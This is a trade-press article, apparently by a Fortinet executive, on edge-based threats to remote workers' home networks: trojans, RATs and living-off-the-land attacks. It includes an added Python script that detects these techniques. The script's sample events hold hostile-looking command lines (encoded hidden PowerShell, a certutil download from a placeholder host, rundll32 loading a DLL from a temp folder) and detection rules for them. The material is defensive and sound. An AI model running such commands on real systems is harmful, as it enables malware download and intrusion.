Cyber threats weaponizing the Edge

Reports indicate that home networks used by remote workers are 3.5x more likely to have at least one family of malware, and 7.5x more likely to have five or more

Cyber threats weaponizing the Edge - CIO&Leader

The traditional network perimeter has been replaced by multiple edge environments: WAN, multi-cloud, data center, Internet of Things (IoT), and home and other remote workspaces. All of these edges are interconnected, which has improved performance, but often at the expense of centralized visibility and unified control. Each edge carries its own risks, and each offers cybercriminals a new way to gain a foothold. In fact, reports indicate that home networks used by remote workers are 3.5x more likely to have at least one family of malware, and 7.5x more likely to have five or more.

The weak security of these home networks makes it inevitable that more attacks on corporate networks will be launched from a remote worker's network at the edge.

Cyber Threats at the Edge

The rise in remote work is exposing corporate networks to the threats that plague residential networks. Malware that targets IoT devices, such as printers, has been prevalent in botnet attacks: once a botnet has infected hundreds of thousands of devices, it can be used for distributed denial of service (DDoS) attacks. Abusing these small IoT devices is a widespread threat today and will keep evolving.

Although end users and their home resources are already targets in their own right, sophisticated attackers can use home-based resources as a springboard for more serious attacks. Edge access trojans (EATs) can perform invasive activities such as intercepting requests on the local network to compromise additional systems or injecting additional attack commands. Along the same lines, a remote access trojan (RAT) is a type of malware that gives the attacker full control of a user's computer. The cybercriminal maintains access to the device over a remote network connection and uses it to steal information or spy on the user.

When cybercriminals combine voice-enabled "smart" devices on a home network with a RAT, the result is a trojan capable of collecting and listening to data and then acting on it. This means that smart devices and other home-based systems that interact with users will no longer simply be targets for attacks but will also be conduits for deeper ones. Cybercriminals can exploit contextual information about users, including daily routines, habits, or financial details, to improve the success rate of their social engineering attacks. Such attacks could lead to much more than turning off security systems, disabling cameras, or hijacking smart appliances; they could enable the ransoming and extortion of additional data or stealthy credential attacks.

Another edge-based threat, "living off the land", lets malware use the toolsets and capabilities already present in a compromised environment so that attacks and data exfiltration look like normal system activity. Because nothing seems out of the ordinary and the attacker is using legitimate tools for the malicious activity, these attacks can be extremely effective. Combining living-off-the-land techniques with EATs is likely to produce new attacks designed to live off the edge, not just the land. As edge devices gain more processing power, more native capabilities, and more privilege, edge-based malware could monitor edge activity and data and then steal, hijack, or even ransom critical systems, applications, and information while avoiding detection.
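The practical consequence of the living-off-the-land point is that a file signature tells a defender nothing when the tool is legitimate; the signal has to come from context, such as which process launched the tool, with what arguments, and whether that pairing is normal for the host. The following Python is an added example written for this page, not code from the article or from Fortinet. The event format, host names, rules and weights are all constructed for illustration and do not describe any vendor product.

```python
"""Context-based scoring of process-creation events for living-off-the-land (LOTL) activity.

Constructed example: the JSON-lines event shape, rule names and weights are
assumptions made for this illustration, not a real product's schema.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    rule: str
    weight: int
    detail: str


# Constructed sample events in a simplified, Sysmon-like JSON-lines shape.
# Backslashes are doubled twice: once for Python, once for JSON.
SAMPLE_EVENTS = """\
{"host":"wfh-laptop-17","parent":"explorer.exe","image":"powershell.exe","cmdline":"powershell.exe -NoProfile Get-ChildItem","user":"alice"}
{"host":"wfh-laptop-17","parent":"winword.exe","image":"powershell.exe","cmdline":"powershell.exe -w hidden -enc SQBFAFgA","user":"alice"}
{"host":"wfh-laptop-17","parent":"powershell.exe","image":"certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://example.invalid/x.txt c:\\\\users\\\\public\\\\x.txt","user":"alice"}
{"host":"print-srv-02","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs","user":"SYSTEM"}
{"host":"print-srv-02","parent":"cmd.exe","image":"rundll32.exe","cmdline":"rundll32.exe c:\\\\windows\\\\temp\\\\upd.dll,Start","user":"printsvc"}
"""

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_FLAG = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")
HIDDEN_FLAG = re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")
WRITABLE_DIR = re.compile(r"(?i)\\(temp|public)\\")


def evaluate(event: dict) -> list[Finding]:
    """Apply context rules to one process-creation event; every tool here is legitimate,
    so only the parent/argument combination can raise a finding."""
    host = event["host"]
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"]
    findings: list[Finding] = []
    if parent in OFFICE_APPS and image in SHELLS:
        findings.append(Finding(host, "office_spawns_shell", 5, f"{parent} -> {image}"))
    if image in POWERSHELL and ENCODED_FLAG.search(cmd):
        findings.append(Finding(host, "encoded_powershell", 4, cmd))
    if image in POWERSHELL and HIDDEN_FLAG.search(cmd):
        findings.append(Finding(host, "hidden_window", 2, cmd))
    if image == "certutil.exe" and "-urlcache" in cmd.lower():
        findings.append(Finding(host, "builtin_downloader", 4, cmd))
    if image in {"rundll32.exe", "regsvr32.exe"} and WRITABLE_DIR.search(cmd):
        findings.append(Finding(host, "dll_from_writable_dir", 3, cmd))
    return findings


def score_hosts(jsonl: str, threshold: int = 6) -> dict[str, dict]:
    """Parse JSON-lines events, sum rule weights per host, and flag hosts at or above
    the (assumed) review threshold. Hosts with no findings are omitted."""
    per_host: dict[str, dict] = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        for f in evaluate(json.loads(line)):
            entry = per_host.setdefault(f.host, {"score": 0, "rules": []})
            entry["score"] += f.weight
            entry["rules"].append(f.rule)
    for entry in per_host.values():
        entry["flagged"] = entry["score"] >= threshold
    return per_host


if __name__ == "__main__":
    for host, entry in score_hosts(SAMPLE_EVENTS).items():
        print(host, entry)
```

The first event on the laptop (an interactive, unencoded PowerShell session launched from the desktop) produces no finding at all, which is the point: the same binary is benign or suspicious depending only on its parent and arguments. Weights and the threshold would in practice be tuned per environment against a baseline of normal activity, and the unflagged print server shows why a single low-weight rule should raise a review rather than an alert.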

Defending Against Cyber Threats at the Edge

As more of these edge attacks become a reality, it is only a matter of time before the malware is commoditized and available as a darknet service or as part of open-source toolkits. It will take a combination of technology, people, training, and partnerships to protect users from these attacks at the edge. Unfortunately, even as the network perimeter becomes more fragmented and more organizations move to a multi-cloud or hybrid networking model, cybersecurity teams continue to operate in silos. As they add more edges and cloud-based access to their networks, many organizations attempt to "bolt on" security tools to protect a given function or segment of the network in isolation. Doing so makes organization-wide visibility and consistent policy enforcement virtually impossible to maintain, and as attacks grow more sophisticated and complex, organizations left with these security gaps become increasingly vulnerable.

Organizations need to take advantage of artificial intelligence (AI) and machine learning (ML) to speed up threat prevention, detection, and response. Advanced endpoint technologies such as endpoint detection and response (EDR) can identify malicious threats based on behaviour rather than signatures. Zero-trust network access (ZTNA) is critical for secure application access and extends protection to mobile workers and learners, while Secure SD-WAN protects evolving WAN edges. Segmentation is another foundational strategy: it restricts lateral movement inside a network and confines a breach to a smaller portion of it. Actionable, integrated threat intelligence improves an organization's real-time defences as the speed of attacks continues to increase. Rather than adding more point products in each of these areas, a better approach is a cybersecurity mesh architecture that integrates security controls into, and across, widely distributed networks and assets.

The author is Regional Vice President - India & SAARC, Fortinet

